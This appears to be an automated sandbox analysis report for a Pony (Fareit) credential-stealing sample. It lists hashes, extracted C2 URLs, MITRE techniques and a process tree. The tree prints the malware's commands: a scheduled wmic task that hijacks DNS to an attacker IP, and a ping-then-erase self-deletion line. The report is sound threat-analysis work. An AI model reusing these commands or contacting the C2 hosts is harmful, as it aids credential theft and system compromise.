pony | 31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718

Analysis

max time kernel
86s
max time network
73s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
20/10/2022, 20:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Size

226KB
MD5

4505bb59758f0fa632e1b1d6e25c5450
SHA1

2d55b6afc4b2495d014aca850bac334e6b363816
SHA256

31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718
SHA512

50ce9806c2fdc171dcf411a9564c3e08935f6a4c3e6729dfbca8327616bb8bfbeac9d6c0c9babe32f4de4876a0de089e9bacf05222be58149c1c6e517f4e510d
SSDEEP

1536:zP7q7CW2p0cUi/PlDxbmpfhjekGbtK01mPHD6JURJM:zPwimfwHtKTHD6uLM

Score

10^/10

pony discovery rat spyware stealer upx

Malware Config

Extracted

Family

pony

http://godekela.pw:571/fix/update.php

http://voekazik.pw:571/fix/update.php

Signatures

Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2044-55-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral1/memory/2044-56-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral1/memory/2044-57-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral1/memory/2044-62-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral1/memory/2044-64-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral1/memory/2044-65-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral1/memory/2044-66-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral1/memory/2044-71-0x0000000000400000-0x000000000041C000-memory.dmp	upx

Deletes itself 1 IoCs

pid	Process
460	cmd.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1088 set thread context of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\calc2.exe	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1048	PING.EXE

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeImpersonatePrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeTcbPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeChangeNotifyPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeCreateTokenPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeBackupPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeRestorePrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeIncreaseQuotaPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeAssignPrimaryTokenPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeImpersonatePrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeTcbPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeChangeNotifyPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeCreateTokenPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeBackupPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeRestorePrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeIncreaseQuotaPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeAssignPrimaryTokenPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeImpersonatePrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeTcbPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeChangeNotifyPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeCreateTokenPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeBackupPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeRestorePrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeIncreaseQuotaPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeAssignPrimaryTokenPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeImpersonatePrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeTcbPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeChangeNotifyPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeCreateTokenPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeBackupPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeRestorePrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeIncreaseQuotaPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
Token: SeAssignPrimaryTokenPrivilege	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26
PID 1088 wrote to memory of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26
PID 1088 wrote to memory of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26
PID 1088 wrote to memory of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26
PID 1088 wrote to memory of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26
PID 1088 wrote to memory of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26
PID 1088 wrote to memory of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26
PID 1088 wrote to memory of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26
PID 1088 wrote to memory of 2044	1088	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	26
PID 2044 wrote to memory of 944	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	27
PID 2044 wrote to memory of 944	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	27
PID 2044 wrote to memory of 944	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	27
PID 2044 wrote to memory of 944	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	27
PID 944 wrote to memory of 288	944	cmd.exe	29
PID 944 wrote to memory of 288	944	cmd.exe	29
PID 944 wrote to memory of 288	944	cmd.exe	29
PID 944 wrote to memory of 288	944	cmd.exe	29
PID 2044 wrote to memory of 460	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	30
PID 2044 wrote to memory of 460	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	30
PID 2044 wrote to memory of 460	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	30
PID 2044 wrote to memory of 460	2044	31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe	30
PID 460 wrote to memory of 1048	460	cmd.exe	32
PID 460 wrote to memory of 1048	460	cmd.exe	32
PID 460 wrote to memory of 1048	460	cmd.exe	32
PID 460 wrote to memory of 1048	460	cmd.exe	32

C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
"C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe
  "C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c at 01:33:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.200", "8.8.8.8")
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:944
  - - C:\Windows\SysWOW64\at.exe
      at 01:33:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.200", "8.8.8.8")
      4⤵
      PID:288
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\31f635559e79406a3abc023f9c29cc2c04a03bd75b866c5f6500ab09c29e6718.exe"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:460
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 10 localhost
      4⤵
      Runs ping.exe
      PID:1048

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1088-59-0x0000000000240000-0x000000000027D000-memory.dmp

Filesize
244KB

Download
memory/1088-54-0x0000000000240000-0x000000000027D000-memory.dmp

Filesize
244KB

Download
memory/2044-61-0x0000000076681000-0x0000000076683000-memory.dmp

Filesize
8KB

Download
memory/2044-62-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2044-63-0x0000000000240000-0x000000000027D000-memory.dmp

Filesize
244KB

Download
memory/2044-64-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2044-65-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2044-66-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2044-57-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2044-56-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2044-71-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2044-55-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download